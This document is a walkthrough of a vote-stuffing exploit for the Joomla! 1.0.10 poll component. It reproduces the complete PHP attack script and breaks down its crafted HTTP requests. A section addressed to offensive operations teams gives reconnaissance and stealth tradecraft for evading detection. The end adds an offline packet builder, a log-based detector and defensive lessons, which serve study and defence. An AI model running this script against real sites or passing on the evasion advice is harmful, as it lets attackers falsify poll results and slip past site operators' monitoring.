Exploiting Joomla! Poll Component 1.0.10 for Arbitrary Vote Addition

What this paper is
This paper describes a vulnerability in the Joomla! Poll Component (com_poll) shipped with Joomla! 1.0.10. It allows an unauthenticated remote attacker to add an arbitrary number of votes to any option of any poll. The exploit is a PHP script that presents a web form to the operator and then sends crafted HTTP requests to the vulnerable Joomla! installation.
Simple technical breakdown
The core of the vulnerability lies in how the poll component decides whether a visitor has already voted. The exploit's design implies that this check is keyed on the visitor's session cookie: the vote POSTs it sends carry no Cookie header at all, and instead pass the site's session cookie name as a query-string parameter with the dummy value 1. Each request to the com_poll&task=vote endpoint therefore arrives looking like a visitor who has never voted, and the server counts it.
The script first issues a HEAD request to the site's index.php and scans the response headers for a 32-character session cookie name. If none is found, it derives one the way Joomla! 1.0.x does, as md5('site' followed by the site URL). It then builds the vote POST: id selects the poll, voteid selects the option (the script converts the option's position into the option's row id, assuming 12 option rows per poll), and the cookie name goes into the query string. It sends that POST once, treats a redirect (Location header) as evidence that the vote was counted, and then repeats the identical request until the requested number of votes has been added.
Complete code and payload walkthrough
The provided PHP script acts as an exploit client. It presents a web form to the user to gather necessary information and then constructs and sends HTTP requests to the target Joomla! site.
Here's a breakdown of the code:
1. Initial Setup and HTML Form:
<?php
# Joomla [poll component] add unlimited votes #
# Computer Security Researchers Institute #
# works regardless of php.ini settings #
# by trueend5 #
# [http://www.KAPDA.ir] #
error_reporting(0); // Suppress all error reporting for a cleaner output.
ini_set("max_execution_time",0); // Set maximum execution time to unlimited.
ini_set("default_socket_timeout", 2); // Set default socket timeout to 2 seconds.
ob_implicit_flush (1); // Automatically flush output buffers.
echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Joomla [poll component] arbitrary add votes</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Joomla [poll
component] arbitrary add votes</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><b><a href="http://www.kapda.ir"><font color="#000000">KAPDA</font></a>.ir</b></p>
<p align="center"> </p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex: /joomla/
or just / )</span></p>
<p><input name="pollid" size="20"> <span class="Stile5"><font color="#FF0000">
*</font> pollid (ex: index.php?option=com_poll&task=results&<b><font size="4">id=14</font></b> )</span></p>
<p><input name="voteid" size="20"><span class="Stile5"><font color="#FF0000">
*</font> voteid ( <b><u>1</u></b> for first option, <b><u>2</u></b>
for second one , <b><u>3</u></b> for third and so... )</span></p>
<p><input name="hits" size="20"><span class="Stile5"><font color="#FF0000">
*</font>
hits ( number of votes that you want to add ) </span></p>
<p><input name="port" size="20"><span class="Stile5"> specify a port
(default: 80)</span></p>
<p><input name="proxy" size="20" ><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form></td></tr></tbody></table></body></html>';

- Purpose: This section initializes the script, sets the PHP runtime up for long-running network work (no execution time limit, a two-second socket timeout, output flushed as it is produced, errors hidden), and displays an HTML form.
- Inputs: The form collects host, path, pollid, voteid, hits, port, and proxy from the user.
- Behavior: It sets up the user interface for the exploit. Two details are worth knowing. The form's action uses $SERVER[PHP_SELF], a typo for $_SERVER['PHP_SELF']; under PHP 5 with error_reporting(0) it evaluates to an empty string, so the form still posts back to the script's own URL by accident. And $proxy is never read from $_POST anywhere in the script, so the proxy field only takes effect when PHP's register_globals is on, despite the "works regardless of php.ini settings" banner.
- Output: An HTML page with input fields for the target and exploit parameters.
2. show() function:
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}

- Purpose: This function prints a string (the script calls it on each outgoing packet before sending) as a hex dump with the ASCII characters alongside, 16 bytes per row, so the operator can inspect exactly what goes on the wire.
- Inputs: $headeri (the string to display).
- Behavior: It walks the string byte by byte, emits each byte as two hex digits, and after every 16 bytes emits the corresponding characters in a second group of cells. The characters are written into the HTML unescaped.
- Output: An HTML table showing the hex dump and ASCII characters of the input string.
3. sendpacket() function (unused in the final execution flow):
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}

- Purpose: An alternative sender built on PHP's socket extension (socket_create/socket_connect). It is defined but never called; sendpacketii() is what the exploit uses. It is also broken as written: the proxy regex is applied before the empty-proxy case is handled, so it would die with "Not a valid proxy..." whenever no proxy is given, and socket_create()/socket_connect() return false rather than a negative number on failure, so neither "< 0" error branch can ever trigger. One line of the original is missing from this walkthrough: between show() and sendpacket() the script defines the proxy validator $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; which both senders use to accept only an ip:port string.
- Inputs: Global variables: $proxy, $host, $port, $packet, $html, $proxy_regex.
- Behavior: It creates a socket, connects to the target (directly or via proxy), sends $packet, reads the response into $html, and closes the socket.
- Output: Populates the global $html variable with the server's response.
4. sendpacketii() function (used in the exploit flow):
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
//echo nl2br(htmlentities($html));
}

- Purpose: This function sends a raw HTTP request and retrieves the response. It is the only sender the exploit actually uses. It supports direct connections and HTTP proxy connections (for the proxy case the main code builds an absolute-URI request line).
- Inputs: $packet (the HTTP request string). Global variables: $proxy, $host, $port, $html, $proxy_regex.
- Behavior:
- If no proxy is specified, it resolves the host and uses fsockopen to connect directly. The return value is not checked, so a refused or timed-out connection produces no error message and the response simply comes back empty.
- If a proxy is specified, it validates the ip:port format against $proxy_regex, connects to the proxy, and dies if the proxy does not answer.
- It writes $packet to the socket.
- It reads the response into the global $html. On a direct connection it reads line by line until EOF. Through a proxy it reads one byte at a time until both EOF has been reached and a blank line (\r\n\r\n, the end of the headers) has been seen; if the proxy's reply never contains a blank line, the loop never terminates (max_execution_time is 0).
- It closes the socket.
- Output: Populates the global $html variable with the server's response.
5. Main Execution Logic:
$host=trim($_POST[host]);
$path=trim($_POST[path]);
$port=intval(trim($_POST[port]));
$pollid=intval(trim($_POST[pollid]));
$voteid=intval(trim($_POST[voteid]));
$hits=intval(trim($_POST[hits]));
if (($host<>'') and ($path<>'') and ($pollid<>'') and ($voteid<>'') and ($hits<>''))
{
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
if ($port=='') {$port=80;}
if ($hits=='') {$hits=200;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$livesite=$host;
if ($path=='/') {$livepath='';} else $livepath=substr("$path", 0, strlen($path)-1);
$sessionpath='http://'.$livesite.$livepath;
$packet="HEAD ".$p."index.php HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
//trying to obtain cookiename from HEADER
$pattern="([a-z0-9]{32}=)";
if(preg_match($pattern, $html, $matches)) {$match=$matches[0];
$sessionCookieName=substr("$match", 0, strlen($match)-1);
} else
//trying to generate cookiename
{$sessionCookieName= md5( 'site'.$sessionpath );}
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
else {
for ($n = 2; $n <= $hits; $n++) {
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
echo "<br />".$n.":added.";
}
echo "<br /> Exploit succeeded <br />";
echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'"><font color="#0000FF">Results</font></a></p>';
}
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>

- Purpose: This is the main execution block that processes user input, constructs exploit packets, and sends them to the target.
- Inputs: User-submitted form data (host, path, pollid, voteid, hits, port, proxy). Only the first six are ever read from $_POST; $proxy is used but never assigned, so the proxy option works only when register_globals is on.
- Behavior:
- Input Sanitization and Defaults: Retrieves and trims user input, casts the numeric fields with intval(), sets port to 80 if it was left empty, and requires path to start and end with "/". The hits default of 200 is dead code: an empty hits field already fails the required-fields test once intval() has turned it into 0.
- Construct Target URL: Builds $p, the request target (an absolute URL only when going through a proxy), and $sessionpath, "http://" plus the host plus the path without its trailing slash, which is the script's guess at the site's configured live site URL.
- Initial HEAD Request: Sends a HEAD request to index.php so the response headers can be inspected for the session cookie.
- Packet:
HEAD /joomla/index.php HTTP/1.1
User-Agent: Shareaza v1.x.x.xx
Host: www.sitename.com
Connection: Close
- Purpose: The script relies on the front page setting its session cookie on first contact, so that the HEAD response carries a Set-Cookie header naming the cookie. The User-Agent is an arbitrary P2P-client string, not a browser; it appears only on this request, the vote POSTs carry no User-Agent at all.
- Session Cookie Name Discovery:
- The pattern ([a-z0-9]{32}=) takes the first run of 32 lowercase alphanumerics followed by "=" anywhere in the response. On a Joomla! 1.0 site that is the session cookie name in the Set-Cookie header (Joomla! 1.0.x names its session cookie with a 32-character md5 hex digest), but the regex is not anchored to Set-Cookie and would just as readily accept any other 32-character token that happens to precede an "=".
- If nothing matches, the fallback md5('site'.$sessionpath) reproduces how Joomla! 1.0.x derives the cookie name from its configured live site URL. It is only right when the site's configured live site is exactly "http://" + host + path with no trailing slash (no https, no port, no alternate hostname).
- Vote ID Manipulation:
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}: voteid is not the option's position within the poll but the global row id of that option in the poll data table, and this loop converts one into the other. It encodes two assumptions about a default Joomla! 1.0 install: the sample poll has id 14 and its option rows are ids 1 to 12, and every poll stores 12 option rows, so option k of poll P lives at row k + 12*(P-14). For poll 14 the loop does nothing; for poll 16, option 3 becomes row 27. On a site whose polls were not created in that exact sequence (a deleted poll, a different starting id), the computed row belongs to another poll or does not exist, and the vote lands on the wrong option or is rejected.
- First Vote Submission (POST Request):
- Constructs a POST request to the poll voting endpoint.
- Packet (host www.sitename.com, path /joomla/, poll 14, option 1; <32hex> stands for the discovered or generated cookie name):
POST /joomla/index.php?option=com_poll&task=vote&id=14&<32hex>=1 HTTP/1.0
Host: www.sitename.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Connection: Close

voteid=1
- Purpose: To cast the initial vote. id selects the poll and voteid the option row. Two details make the request count as a fresh voter: no Cookie header is sent at all, and the session cookie name is supplied as a query-string parameter with the dummy value 1, so a server that reads the session identifier from merged request input (rather than only from the Cookie header) sees a session it never issued and has no voting history for.
- Redirection Check: It checks whether the response contains a Location header. The vote handler redirects to the results page after processing, so the script takes a Location header as proof that the vote was counted; it never verifies the poll totals.
- Loop for Multiple Votes: If the first submission produced a redirect, it sends the identical packet hits-1 more times (the loop starts at 2 because the first vote was already cast), checking for Location each time and aborting with "Exploit failed..." on the first miss. Each iteration opens a new TCP connection (Connection: Close) with no delay, so the rate is bounded only by the server's response time.
- Success/Failure Output: Reports whether the exploit succeeded or failed and prints a link to the poll's results page, built from $sessionpath and pollid.
- Output: Displays progress ("n:added."), success/failure messages, and a link to poll results.
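As an added example (Python, not the paper's PHP, and not code from the original script), the following re-implements the script's preparatory steps offline so they can be checked without a target: cookie-name discovery from a HEAD response, the md5 fallback, the voteid arithmetic, and byte-exact construction of the vote POST. The sample response headers and the decoy header are constructed for the example; the stricter Set-Cookie-anchored matcher is an addition, not something the script does. Nothing is sent over the network.

```python
import hashlib
import re

# Constructed sample of the headers a Joomla! 1.0.x front page might return to the
# script's HEAD request. The cookie name and value are made-up hex strings.
SAMPLE_HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 19 Aug 2006 10:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: 7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=0123456789abcdef0123456789abcdef; path=/\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
# Same response plus a constructed header whose value also satisfies the script's loose pattern.
DECOY_HEAD_RESPONSE = SAMPLE_HEAD_RESPONSE.replace(
    "Server: Apache\r\n",
    "Server: Apache\r\nX-Request-Id: 00000000000000000000000000000000=\r\n",
)

FIRST_POLL_ID = 14      # assumption baked into the script: id of the sample poll in a default install
OPTIONS_PER_POLL = 12   # assumption baked into the script: option rows stored per poll


def discover_cookie_name(head_response: str):
    """The script's loose rule: the first 32 lowercase alphanumerics followed by '='."""
    m = re.search(r"[a-z0-9]{32}=", head_response)
    return m.group(0)[:-1] if m else None


def discover_cookie_name_strict(head_response: str):
    """Anchored variant (added here): the name must come from a Set-Cookie header."""
    m = re.search(r"^Set-Cookie:\s*([0-9a-f]{32})=", head_response, re.MULTILINE)
    return m.group(1) if m else None


def fallback_cookie_name(host: str, path: str) -> str:
    """The script's fallback: md5('site' + 'http://' + host + path without its trailing slash)."""
    livepath = "" if path == "/" else path.rstrip("/")
    return hashlib.md5(("site" + "http://" + host + livepath).encode()).hexdigest()


def option_row_id(pollid: int, option_index: int) -> int:
    """Reproduce the voteid adjustment loop: +12 for every poll id from 14 up to pollid-1."""
    voteid = option_index
    for _ in range(FIRST_POLL_ID, pollid):   # empty when pollid <= 14, exactly like the PHP loop
        voteid += OPTIONS_PER_POLL
    return voteid


def build_vote_request(host: str, path: str, pollid: int, voteid: int, cookie_name: str) -> bytes:
    """Byte-exact copy of the script's vote POST: no Cookie or User-Agent header,
    the session cookie name carried as a query parameter with the value 1."""
    body = f"voteid={voteid}"
    head = (
        f"POST {path}index.php?option=com_poll&task=vote&id={pollid}&{cookie_name}=1 HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: Close\r\n\r\n"
    )
    return (head + body).encode()


def parse_request(raw: bytes):
    """Split a request into (request line, header dict, body) to check what was built."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode().split("\r\n")
    headers = dict(line.split(": ", 1) for line in lines[1:])
    return lines[0], headers, body.decode()


if __name__ == "__main__":
    name = discover_cookie_name(SAMPLE_HEAD_RESPONSE) or fallback_cookie_name("www.sitename.com", "/joomla/")
    print(build_vote_request("www.sitename.com", "/joomla/", 16, option_row_id(16, 3), name).decode())
```

The decoy response shows why the script's pattern is fragile: the first 32-character token followed by "=" wins, wherever it sits in the headers, and the strict matcher is the cheap fix.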
Payload/Shellcode:
There is no traditional shellcode or executable payload in this script. The "payload" is the crafted HTTP POST request that exploits the vulnerability. The script itself is the attacker's tool.
Code Fragment/Block -> Practical Purpose Mapping:
- error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); -> Script initialization and network tuning: no time limit, two-second socket timeout, progress flushed as it happens, errors hidden.
- echo '<html>...</html>'; -> User interface: the HTML form for operator input.
- function show($headeri) -> Debugging and traffic analysis: hex dump of each outgoing packet.
- function sendpacket() -> Dead code: an alternative socket-based sender that is never called.
- function sendpacketii($packet) -> Network communication: sends one raw HTTP request, directly or via an HTTP proxy, and stores the response in $html.
- $host=trim($_POST[host]); ... $hits=intval(trim($_POST[hits])); -> Input gathering: target and exploit parameters from the form.
- if (($host<>'') and ...) -> Input validation and pre-processing: required-field check, path format check, port default.
- HEAD ... request block -> Information gathering: fetches response headers to find the session cookie name.
- $pattern="([a-z0-9]{32}=)"; if(preg_match(...)) -> Session cookie discovery: takes the first 32-character alphanumeric token followed by "=" as the cookie name.
- else {$sessionCookieName= md5( 'site'.$sessionpath );} -> Session cookie fallback: derives the name the way Joomla! 1.0.x does, from the guessed live site URL.
- for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;} -> Vote id adjustment: maps the option's position to its row id, assuming 12 option rows per poll and poll 14 as the first poll.
- POST ...?option=com_poll&task=vote&id=...&<cookiename>=1 HTTP/1.0 ... voteid=... -> Exploitation packet: the vote request, with no Cookie header and the cookie name carried as a query parameter.
- if (!eregi("Location",$html)) -> Exploit success check: a redirect response is taken as a counted vote.
- for ($n = 2; $n <= $hits; $n++) { ... sendpacketii($packet); ... } -> Repetitive voting loop: resends the same packet until hits votes have been added.
- echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'">Results</a></p>'; -> Post-exploitation feedback: link to the manipulated results page.
Practical details for offensive operations teams
- Required Access Level: Typically requires network access to the target Joomla! instance. No prior authentication or specific user privileges are needed if the poll component is publicly accessible.
- Lab Preconditions:
- A vulnerable Joomla! installation (version 1.0.10 with the poll component).
- A known poll ID and the option's position within that poll (the script converts the position into a row id under the default-install assumptions described above).
- The exploit script needs to be hosted on a web server accessible by the operator, or run locally if the operator has a PHP 5 environment (the script uses eregi(), which was removed in PHP 7).
- Tooling Assumptions:
- A web browser to interact with the exploit script's HTML form.
- A PHP interpreter to run the exploit script.
- Network connectivity to the target.
- Optional: A proxy server (like Burp Suite or OWASP ZAP) can be used to intercept and analyze traffic, or to forward the exploit requests if the target is only accessible via a proxy.
- Execution Pitfalls:
- Incorrect pollid or voteid: If these are wrong, the exploit targets the wrong poll or option. Because the script treats voteid as a row id computed from pollid (12 rows per poll, starting at poll 14), a site whose polls were not created in that sequence needs the real row id worked out by hand.
- Incorrect path: The script expects a path that starts and ends with "/" (e.g. /joomla/ or /). Anything else is rejected before a request is sent; a well-formed but wrong path produces a 404 and no Set-Cookie header to match on.
- Server-side WAF/IDS: Modern Web Application Firewalls or Intrusion Detection Systems can flag this traffic easily: repeated POSTs to com_poll&task=vote from one address, a POST carrying no Cookie and no User-Agent header, and a 32-character hex parameter name in the query string.
- Rate Limiting: The target may throttle or block a burst of POSTs from one address. The script has no delay between requests and opens a new connection for every vote; default_socket_timeout only caps how long a stalled connection is waited on, it does not pace the attack.
- Session Cookie Discovery: If the front page does not set a cookie on a HEAD request, or the first 32-character token in the response is not the cookie name, the fallback md5('site'.$sessionpath) is used, and that is only correct when the site's configured live site URL is exactly http://host plus the path without its trailing slash.
- PHP Configuration: The script needs PHP 5 (eregi() was removed in PHP 7) with fsockopen() available. The proxy option only works when register_globals is on, because $proxy is never read from $_POST. A failed direct connection is not checked either: fsockopen() returning false is used as if it were a stream, with errors suppressed, so the script gives no diagnostic.
- HTTP Versions and Proxy Reads: The HEAD request is HTTP/1.1 and the vote POSTs are HTTP/1.0, both with a Host header and Connection: Close; any HTTP/1.1 server accepts that, so this is not a failure mode. Through a proxy, however, the response is read byte by byte until both EOF and a blank line have been seen, which hangs if the proxy's reply never contains one.
- Vote ID Loop Logic: The for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;} mapping is only valid for a default-style install; see above.
- Tradecraft Considerations:
- Reconnaissance: Before running the exploit, confirm the Joomla! version and the presence of the poll component, and identify the correct pollid and option position. On anything but a default-style install, check that the row id the script computes actually belongs to the target poll.
- Stealth: The traffic is easy to fingerprint. The HEAD request announces a P2P client (Shareaza) as its User-Agent, and the vote POSTs carry no User-Agent, no Cookie and no Referer, whereas a legitimate vote comes from a browser that loaded the poll page first. Mimicking a browser would mean adding those headers, keeping the issued cookie, and spacing the requests out. Hosting the script on dedicated infrastructure rather than the operator's own address is a matter of attribution, not of evading the server-side signal.
- Timing: Executing the exploit during off-peak hours might reduce the chance of immediate detection by administrators watching server load, but a burst of identical POSTs is just as visible in the access log afterwards.
- Proxy Usage: The script's proxy option sends absolute-URI requests through an HTTP proxy; chaining proxies only hides the origin address, not the request pattern.
- Post-Exploitation: After successfully manipulating votes, the operator should document the results. The poll component gives no further access by itself, so any escalation would depend on other findings.
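The WAF/IDS and stealth points above describe what this script looks like from the server side. As an added example (not from the original paper), here is that detection logic run over constructed Apache combined-format log lines that reproduce the script's request shape: the Shareaza User-Agent on the HEAD probe, vote POSTs with no User-Agent or Referer, a 32-character hex parameter name in the query string, and a burst from one address. The log lines, the addresses (RFC 5737 ranges), the log format and the thresholds are all made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format log: one browser visitor who loads the poll page
# and votes once, then the script's HEAD probe and a burst of vote POSTs from a second address.
SAMPLE_LOG = """\
198.51.100.4 - - [19/Aug/2006:10:00:01 +0000] "GET /joomla/index.php?option=com_poll&id=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
198.51.100.4 - - [19/Aug/2006:10:00:09 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14 HTTP/1.1" 302 - "http://www.sitename.com/joomla/index.php?option=com_poll&id=14" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
203.0.113.7 - - [19/Aug/2006:10:02:00 +0000] "HEAD /joomla/index.php HTTP/1.1" 200 - "-" "Shareaza v1.x.x.xx"
203.0.113.7 - - [19/Aug/2006:10:02:01 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
203.0.113.7 - - [19/Aug/2006:10:02:01 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
203.0.113.7 - - [19/Aug/2006:10:02:02 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
203.0.113.7 - - [19/Aug/2006:10:02:02 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
203.0.113.7 - - [19/Aug/2006:10:02:03 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
203.0.113.7 - - [19/Aug/2006:10:02:04 +0000] "POST /joomla/index.php?option=com_poll&task=vote&id=14&7f3b2e9c1d4a5b6c7d8e9f0a1b2c3d4e=1 HTTP/1.0" 302 - "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
HEX32_PARAM = re.compile(r"[?&]([0-9a-f]{32})=")   # a session cookie name used as a query parameter
BURST_THRESHOLD = 5   # vote POSTs from one address ...
BURST_WINDOW = 60     # ... within this many seconds (thresholds chosen for the example)


def parse_log(text):
    """Parse combined-format lines into dicts; timestamps become aware datetimes."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(e)
    return entries


def is_vote_post(e):
    return e["method"] == "POST" and "option=com_poll" in e["url"] and "task=vote" in e["url"]


def detect(entries, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Return (kind, ip, detail) findings for the three signals the script's traffic leaves."""
    findings = []
    vote_times = defaultdict(list)
    for e in entries:
        if not is_vote_post(e):
            continue
        vote_times[e["ip"]].append(e["ts"])
        hexparam = HEX32_PARAM.search(e["url"])
        if hexparam:
            findings.append(("session_name_in_query", e["ip"], hexparam.group(1)))
        if e["ua"] == "-" or e["referer"] == "-":
            findings.append(("headless_vote", e["ip"], f"ua={e['ua']!r} referer={e['referer']!r}"))
    for ip, times in vote_times.items():
        times.sort()
        start = 0
        for end in range(len(times)):            # sliding window over this address's vote POSTs
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                findings.append(("vote_burst", ip, f"{end - start + 1} vote POSTs within {window}s"))
                break
    return findings


if __name__ == "__main__":
    for kind, ip, detail in detect(parse_log(SAMPLE_LOG)):
        print(f"{kind:22} {ip:15} {detail}")
```

The burst rule alone would also catch a shared NAT address with many genuine voters; the other two signals (cookie name in the query string, no User-Agent or Referer on a POST) are what separate this script from that case, so in practice alert on the burst and use the others to rank it.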
Where this was used and when
This exploit targets Joomla! version 1.0.10, released in mid-2006, so it would have been relevant in the mid-to-late 2000s. Specific documented real-world attacks using this exact script are not readily available in public records, but vulnerabilities in popular CMS components were commonly exploited during that era to deface websites, manipulate content, or gain initial footholds. The milw0rm publication date of 2006-08-19 (the entry is now archived on exploit-db.com) shows the vulnerability and exploit were public at that time.
Defensive lessons for modern teams
- Keep Software Updated: This is the most critical lesson. Running outdated versions of Content Management Systems (CMS) like Joomla! and their extensions is a primary vector for compromise. Regularly patch and update all components.
- Component Auditing: Understand which components are installed and their versions. Regularly audit for outdated or vulnerable extensions.
- Input Validation: Implement robust server-side validation for all user inputs, especially those that affect application logic or data integrity. This includes checking data types, lengths, and expected formats.
- Secure Voting Mechanisms:
- Rate Limiting: Implement rate limiting on sensitive actions like voting to prevent brute-force or repetitive submissions.
- CAPTCHA/Human Verification: For public voting systems, use CAPTCHAs or other human verification methods to distinguish legitimate users from automated scripts.
- Session Management: Keep vote state server-side, keyed on a server-issued session or account, and read the session identifier only from the Cookie header, never from the query string or form body. Treat an unknown session as a request to reject, not as a new visitor to welcome. A deterministic cookie name (here an md5 of the site URL) is harmless by itself; it only matters because the server trusted whatever arrived under it.
- IP Address/User Tracking: While not foolproof, tracking votes by IP address or logged-in user can help identify suspicious patterns. However, this needs careful consideration to avoid disenfranchising legitimate users.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attack patterns, including malformed requests, suspicious user agents, and repetitive POST requests to sensitive endpoints.
- Logging and Monitoring: Implement comprehensive logging of web server and application events. Monitor logs for unusual activity, such as a sudden spike in requests to the poll component or repeated failed attempts to access specific URLs.
- Component Security Reviews: Before deploying any third-party component, conduct a security review or rely on reputable sources that have vetted the component's security.
